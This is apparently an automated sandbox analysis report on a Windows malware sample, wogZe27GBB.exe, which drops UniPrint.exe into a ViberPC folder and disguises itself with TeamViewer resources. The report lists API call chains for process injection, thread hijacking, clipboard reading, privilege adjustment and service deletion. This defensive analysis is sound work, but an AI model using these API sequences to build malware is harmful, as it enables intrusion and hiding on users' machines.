Source: wogZe27GBB.exe, 00000000.00000002.687265368.000000000079A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 0_2_00405042
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CA020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop, 3_2_6E5CA020

System Summary:

Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040323C EntryPoint,7329E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040323C
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6E5C5F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_6E5C5F30
Detected potential crypto function
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404853 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00406131 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053C2D6 5_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004A13AA 5_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053E430 5_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004C97CD 5_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00534810 5_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_005438ED 5_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004AC8A9 5_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00544B6A 5_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004B9F5A 5_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00546FFB 5_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004A0FB2 5_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029AF876 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 12_2_027ED77A 12_2_027ED77A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCE8 appears 61 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 3_2_6E5C3760
Contains functionality to call native functions
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 0_2_00401000
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6E5CB420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6E5C8AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB340 NtGetContextThread,NtSetContextThread, 3_2_6E5CB340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB570 NtSuspendThread,NtClose, 3_2_6E5CB570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB160 NtProtectVirtualMemory, 3_2_6E5CB160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 3_2_6E5C89F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree, 3_2_6E5CB5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache, 3_2_6E5CB650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 3_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 3_2_6E5C2440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 3_2_6E5C5220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C26E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 3_2_6E5C26E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 3_2_6E5C1C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 3_2_6E5C1A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CA880 NtQueryVirtualMemory, 3_2_6E5CA880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB0B9 NtProtectVirtualMemory, 3_2_6E5CB0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 3_2_6E5C1570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1960 NtProtectVirtualMemory, 3_2_6E5C1960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 3_2_6E5C7D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 3_2_6E5C2FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C27F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 3_2_6E5C27F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB1A0 NtOpenThread, 3_2_6E5CB1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 5_2_6E5CB420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB570 NtSuspendThread,NtClose, 5_2_6E5CB570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 5_2_6E5C7D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree, 5_2_6E5CB5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 5_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 5_2_6E5C8AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB340 NtGetContextThread,NtSetContextThread, 5_2_6E5CB340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB160 NtProtectVirtualMemory, 5_2_6E5CB160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 5_2_6E5C89F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache, 5_2_6E5CB650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C26E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose, 5_2_6E5C26E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C27F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 5_2_6E5C27F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 5_2_6E5C2FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 5_2_6E5C2440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 5_2_6E5C1C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 5_2_6E5C1570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle, 5_2_6E5C5220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 5_2_6E5C1A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CA880 NtQueryVirtualMemory, 5_2_6E5CA880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB0B9 NtProtectVirtualMemory, 5_2_6E5CB0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1960 NtProtectVirtualMemory, 5_2_6E5C1960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB1A0 NtOpenThread, 5_2_6E5CB1A0
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: No import functions for PE file found
Sample file name differs from the original file name gathered from version info
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
PE file contains strange resources
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Section loaded: firewallapi.dll
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 3_2_6E5C3850
Source: wogZe27GBB.exe Virustotal: Detection: 53%
Source: wogZe27GBB.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\user\Desktop\wogZe27GBB.exe
Source: wogZe27GBB.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
